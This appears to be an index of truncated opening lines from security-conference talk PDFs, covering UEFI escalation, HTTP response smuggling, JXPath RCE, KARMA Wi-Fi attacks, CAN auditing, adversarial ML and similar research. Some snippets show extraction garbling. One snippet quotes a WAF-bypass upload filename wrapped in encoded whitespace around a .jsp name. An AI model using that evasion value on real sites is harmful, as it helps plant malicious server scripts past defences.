Extreme Privilege Escalation On Windows 8/UEFI Systems Corey Kallenberg Xeno Kovah John Butterworth Sam Cornwell ckallenberg@mitre.org, xkovah@mitre.org jbutterworth@mitre.org, scornwell@mitre.org The MITRE Corporation Approved for Public Release Distribution Unlimited. Case Number 14-2221 Abstract The UEFI specificatio...
pdf
1 UPnProxyPot: fake the funk, become a blackhat proxy, MITM their TLS, and scrape the wire. 2 d1rt Chad Seaman 3 Akamai SIRT Team Lead & Senior Engineer 4 5 First things first INTERNET OF THINGS What is IoT? 6 First things first INTERNET OF THINGS What is IoT? TRASH 7 Your abstract sucked, what is this about? SSDP & ...
pdf
FORENSICS IS ONLY FOR PRIVATE INVESTIGATORS NOW! OR WHO NEEDS CERTIFICATIONS? Scott A. Moulton Forensic Strategy Services, LLC. www.ForensicStrategy.com DISCLAIMER   This is NOT Animated!   Everything I state is my opinion and is based on my research and experiences.   I am not A lawyer!   I am not YOU...
pdf
Response Smuggling Pwning HTTP/1.1 Connections Agenda - HTTP Request Smuggling - Desynchronization Variants - Response Smuggling - Response Concatenation - Arbitrary Proxy Cache Poisoning/Deception - Response Scripting HTTP Request Smuggling HTTP Request Smuggling - Attack introduced in 2005 by Watchfire - Abuse discre...
pdf
The$newest$version$of$this$slide$deck$and$other$ related$stuff$can$be$found$at$ http://truckhacking.github.io/ Cheap$Tools$for$Hacking$ Heavy$Truck By#Haystack#and#Six#Volts What$we$are$going$to$talk$about • Heavy#Trucks:#similarities#and#differences#from#cars • R&D#Problems:#Trucks#are#expensive#and#the#workaround • N...
pdf
UTILIZING POPULAR WEBSITES FOR MALICIOUS PURPOSES USING RDI Daniel Chechik, Anat (Fox) Davidi Security Web Scanners What is RDI? 3 Reflected DOM Injection Legit Legit Malicious A Recipe for Disaster 4 §  1 simple web page §  1 trustworthy web utility §  1 script that behaves differently within a certa...
pdf
浅析Apache Commons Jxpath命令执⾏分 析(CVE-2022-41852) 影响版本 commons-jxpath:commons-jxpath <= 1.3 ⼀直到最新版本,官⽅也不打算修了 利⽤探索 测试环境:jxpath1.3 JXPath⽀持标准的XPath函数,开箱即⽤。它还⽀持 "标准 "扩展函数,这些函数基本上是通往 Java的桥梁,以及完全⾃定义的扩展函数。 简单从漏洞描述可以看出由于解析xpath表达式的问题造成的漏洞 其实这来源官⽅的⼀个feature,如图看起来它赋予了我们⼀种动态执⾏代码的能⼒ 这时候我们就会想为什么会有这种奇怪的需求,毕竟从平时经验来讲xpath,作为⼀种路径语 ⾔,它的功...
pdf
1" 2" 3" 7" 8" 9" 10" 11" 12" This"is"how"networks"show"up"in"your"network"list"when"searching"for"wifi"networks" on"your"device." 13" When"you"join"a"network,"this"interacCon"happens." 14" 15" 16" KARMA"aKacks"do"exactly"the"same"thing"as"a"normal"associaCon,"it’s"just"an"evil"AP" instead"of"the"actual"AP"doing"it." 17...
pdf
The future is present, here and now. But to see it, you must fly. Richard Thieme leads you to the edge of a cliff... and gives you a push. New ways of thinking emerge during free fall. Identities diverge, shapes change, and questions linger long after you put down this astonishing book. Mind Games provides wings. Risk...
pdf
云安全体系下的安全技术对抗 演讲人: 张文君(Junzz) 关于演讲者 张文君 (Junzz) 金山网络安全研究员 负责金山毒霸内核驱动和顽固病毒查杀相关开发 对严重安全事件快速分析和回应有丰富经验 曾处理过众多大陆知名流行病毒:极虎,鬼影,杀破网,淘宝大盗,极光,超级 工厂,AV 终结者等. 云对抗-手法 •断网 -切断和云端服务器的联络 -修改查询结果 •变形 -MD5变形 -膨胀自身 •Misc -BootKit -Bat、Vbs、Msi 客户端 批处理/脚本 修改DNS 本地路由表 IP组策略 修改TcpEntry LSP劫持 Hook TCPIP 云端 NDIS中间层 断网 阻断交互 本地添加IP地址 修改查询 结果 M...
pdf
This document and its content is the property of Airbus Defence and Space. It shall not be communicated to any third party without the owner’s written consent | [Airbus Defence and Space Company name]. All rights reserved. CANSPY A Platform for Auditing CAN Devices Arnaud Lebrun Jonathan-Christofer Demay 2 Arnau...
pdf
Securing the Tor Network Black Hat USA 2007 Supplementary Handout Mike Perry This handout is not a standalone document. It is intended to be used in conjunction with the presentation slides, and together the two documents should be sufficient to serve as a comprehensive artifact of the presentation. The sp...
pdf
whoami Maggie Jauregui @magsjauregui Ideas/research my  own… Story time! Supply Acquisition Circuit Interrupts around the house ≠  Purposes GFCI: Intends to prevent Electric Shock AFCI: Intends to prevent fires Code Requirements GFCI’s • Bathrooms/Indoor wet locations • Garages/storage areas/non habi...
pdf
Backdooring the Front Door About me ● Software Engineer by trade ● Hacker by passion ● Lock picker for fun ● The best puzzles are not meant to be solved ● All opinions are my own, and may not reflect those of my past, present, or future employers ● Twitter: @jmaxxz Internet of things August smart lock August's market...
pdf
From Raxacoricofallapatorius With Love Case Studies in Insider Threat AGENDA • Introduction & Curriculum Vitae • History & Current Events • Definitions • Case Studies • Current Research • Sources FAMOUS (Infamous?) INSIDER THREATS Cost to pay Insider Dr. Ten Hong Lee to turn over highly sensitive and...
pdf
本书由Meji制作,于广州,2002年11月. 注意,本书的一切所有权及版权归译者,著者及中国电力出版社所有,一切由本电子版引发之民事刑事纠纷与本人 无关.本电子书的制作纯粹处于传播知识之目的,禁止将本电子书用作盈利之目的,若有恣意妄为者后果自负. PDF 文件以 "FinePrint pdfFactory Pro" 试用版创建 http://www.pdffactory.com
pdf
Machine Duping Pwning Deep Learning Systems CLARENCE CHIO MLHACKER @cchio adapted from Dave Conway HACKING SKILLS MATH & STATS SECURITY RESEARCHER HAX0R DATA SCIENTIST DOING IT ImageNet Google Inc. Google DeepMind UMass, Facial Recognition Nvidia DRIVE Nvidia Invincea Malware Detection System Deep Learning why ...
pdf
Proprietary and Confidential. Do Not Distribute. © 2013 Accuvant, Inc. All Rights Reserved. Proprietary and Confidential. Do Not Distribute. © 2013 Accuvant, Inc. All Rights Reserved. GoPro or GTFO A Tale of Reversing an Embedded System Proprietary and Confidential. Do Not Distribute. © 2013 Accuvant, Inc. All Righ...
pdf
@Y4tacker Java⽂件上传⼤杀器-绕waf(针对commons- fileupload组件) 来个中⼆的标题,哈哈哈,灵感来源于昨晚赛博群有个师傅@我是killer发了篇新⽂章,在那 篇⽂章当中提到了在 filename="1.jsp" 的filename字符左右可以加上⼀些空⽩字符 %20 %09 %0a %0b %0c %0d %1c %1d %1e %1f ,⽐如 %20filename%0a="1.jsp"(直接⽤ url编码为了区别) 这样导致waf匹配不到我们上传⽂件 名,⽽我们上传依然可以解析,我对 次进⾏了更深⼊的研究,也是对师傅⽂章对⼀次补充,下⾯为了衔接还是先梳理⼀遍,看过 赛博群的师傅可以先跳过前⾯...
pdf
最近有一些代码审计需要,研究了一下自动化审计工具 考虑了一些备选工具 1. Kunlun-M LoRexxar大佬的审计工具,文档似乎比较老旧,学习成本比较高,试用了一下就放着了 2. CodeQL GitHub搞得审计工具,QL逐渐流行起来,很多师傅写过文章 3. Semgrep 很早之前看过介绍文章,简单的规则编写让我印象非常深刻 刚好有需求,决定研究学习一下Semgrep 官方提供了非常棒的教程,强烈推荐学习一下 https://semgrep.dev/learn 本文是在学习和尝试实践后,个人的一些体验分享(基于 Semgrep 0.88.0 ) ltdr 可以学习,暂时不推荐使用,但未来可期 跳到总结部分 像写代码一样写...
pdf